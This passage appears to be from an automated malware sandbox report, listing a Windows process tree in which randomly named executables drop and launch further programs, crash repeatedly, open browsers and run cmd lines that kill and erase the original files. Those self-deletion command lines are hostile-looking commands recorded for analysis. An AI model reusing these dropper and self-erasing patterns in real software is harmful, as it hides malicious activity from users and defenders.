  "C:\Users\Admin\Documents\AMpO2NVoxbvK4SwkXf02e9LJ.exe"
  2⤵
  PID:3344
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 764
    3⤵
    - Program crash
    PID:6208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 824
    3⤵
    - Program crash
    PID:6148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 804
    3⤵
    - Program crash
    PID:4360
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 852
    3⤵
    - Program crash
    PID:748
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 908
    3⤵
    - Program crash
    PID:4612
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 1008
    3⤵
    - Program crash
    PID:8968
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7845795572.exe"
    3⤵
    PID:9176
  - - C:\Users\Admin\AppData\Local\Temp\7845795572.exe
      "C:\Users\Admin\AppData\Local\Temp\7845795572.exe"
      4⤵
      PID:1236
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 1724
    3⤵
    - Program crash
    PID:10172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3344 -s 1096
    3⤵
    - Program crash
    PID:9816
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1492439142.exe"
    3⤵
    PID:10492
  - - C:\Users\Admin\AppData\Local\Temp\1492439142.exe
      "C:\Users\Admin\AppData\Local\Temp\1492439142.exe"
      4⤵
      PID:8092
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "AMpO2NVoxbvK4SwkXf02e9LJ.exe" /f & erase "C:\Users\Admin\Documents\AMpO2NVoxbvK4SwkXf02e9LJ.exe" & exit
    3⤵
    PID:10896
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "AMpO2NVoxbvK4SwkXf02e9LJ.exe" /f
      4⤵
      Kills process with taskkill
      PID:11336
- C:\Users\Admin\Documents\v9wazG7G_ZThk9NJ5eT96t0v.exe
  "C:\Users\Admin\Documents\v9wazG7G_ZThk9NJ5eT96t0v.exe"
  2⤵
  - Executes dropped EXE
  PID:788
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:6796
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      4⤵
      PID:6940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    PID:7480
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa8ca14f50,0x7ffa8ca14f60,0x7ffa8ca14f70
      4⤵
      PID:13372
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1532 /prefetch:2
      4⤵
      PID:11496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1696 /prefetch:8
      4⤵
      PID:13556
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1944 /prefetch:8
      4⤵
      PID:13688
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1
      4⤵
      PID:13664
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2640 /prefetch:1
      4⤵
      PID:13712
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
      4⤵
      PID:13604
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
      4⤵
      PID:14552
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
      4⤵
      PID:14488
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
      4⤵
      PID:14400
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4424 /prefetch:8
      4⤵
      PID:12464
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
      4⤵
      PID:14416
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 /prefetch:8
      4⤵
      PID:14952
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4960 /prefetch:2
      4⤵
      PID:16116
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,3036553062904804470,16836962708334951384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5028 /prefetch:8
      4⤵
      PID:13560
  - - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
      4⤵
      PID:14436
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 788 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\v9wazG7G_ZThk9NJ5eT96t0v.exe"
    3⤵
    PID:14152
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 788
      4⤵
      Kills process with taskkill
      PID:14036
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C taskkill /F /PID 788 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\v9wazG7G_ZThk9NJ5eT96t0v.exe"
    3⤵
    PID:14144
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /PID 788
      4⤵
      Kills process with taskkill
      PID:13880
- C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
  "C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe"
  2⤵
  - Executes dropped EXE
  PID:2896
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:1160
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5488
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2676
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:3908
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 24
      4⤵
      Program crash
      PID:6192
  - - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
      4⤵
      PID:4636
  - - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
      "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
      4⤵
      PID:4584
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6288
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6652
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7116
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6676
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4508
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5832
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6192
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7300
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7680
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8004
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5928
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7832
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8136
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6684
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5640
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7228
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2044
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6852
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4564
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8084
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8616
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4304
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:3512
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9048
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4384
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2252
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2564
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6520
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 24
      4⤵
      Program crash
      PID:4716
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8348
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7736
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4960
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8968
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5896
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9276
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5836
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9648
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9992
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6184
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:5276
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4672
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10096
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10140 -s 24
      4⤵
      Program crash
      PID:10204
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10132
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:4248
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2532
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:2624
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 24
      4⤵
      Program crash
      PID:3008
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:8808
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8808 -s 24
      4⤵
      Program crash
      PID:1304
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10000
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7224
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10464 -s 24
      4⤵
      Program crash
      PID:10812
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10820
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11140
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7292
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10708
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10336
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7204
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10336
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11256
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7016
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9068
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11472
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11948
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:12244
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11608
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11940
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10572
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:6576
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:9296
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11200
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    - Executes dropped EXE
    PID:3344
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10512
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 10512 -s 24
      4⤵
      Program crash
      PID:11032
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:7188
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:12340
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 12340 -s 24
      4⤵
      Program crash
      PID:13256
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:13200
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:11696
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
    3⤵
    PID:10352
- - C:\Users\Admin\Documents\s3fI1Ks3w3WQZHQVQ5vchIY5.exe
